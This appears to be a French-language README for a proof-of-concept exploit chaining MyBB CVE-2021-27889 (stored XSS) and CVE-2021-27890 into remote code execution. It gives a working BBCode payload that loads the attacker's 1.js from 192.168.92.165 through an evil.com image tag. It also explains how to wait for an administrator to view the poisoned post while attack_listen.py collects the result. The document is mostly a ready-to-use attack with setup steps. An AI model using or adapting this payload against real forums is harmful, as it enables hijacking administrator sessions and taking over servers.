
Mybb associe CVE-2021-27890 et CVE-2021-27889 à RCE poc
Mybb associe CVE-2021-27890 & CVE-2021-27889 au POC RCE
Avant utilisation :
Il y a deux fichiers ici : 1.js et attack_listen.py
Vous devez modifier ces deux fichiers :
1.js :
modifiez l'URL du forum Mybb et l'URL d'attaque :
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py :
modifiez l'hôte d'attaque et le port d'attaque :
attack_host = '192.168.92.165'
attack_port = 8080
Utilisation :
CVE-2021-27889 est une XSS. Vous devez injecter la charge utile suivante dans « New Post Thread », « Reply » ou « Private Messages » avant de lancer l'attaque. Dans cette démo, j'envoie la charge utile dans « New Post Thread ».
Notez que 192.168.92.165 est l'adresse IP du serveur malveillant, vous devez la modifier.
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

Maintenant, notre JS malveillant 1.js est injecté avec succès. Ensuite, nous devons attendre qu'un administrateur consulte ce message avec le cookie de sa session d'administration connectée.
Notez que l'utilisateur administrateur n'a pas nécessairement besoin de se connecter à la page du forum.
Pendant ce temps d'attente, nous devons exécuter "attack_listen.py" sur notre machine d'attaque, pour identifier si l'utilisateur administrateur a été attaqué.
python3 attack_listen.py
Lorsque l'utilisateur administrateur consulte le message malveillant, le JS malveillant lancera l'attaque :

Nous pouvons recevoir les informations sur notre machine d'attaque :

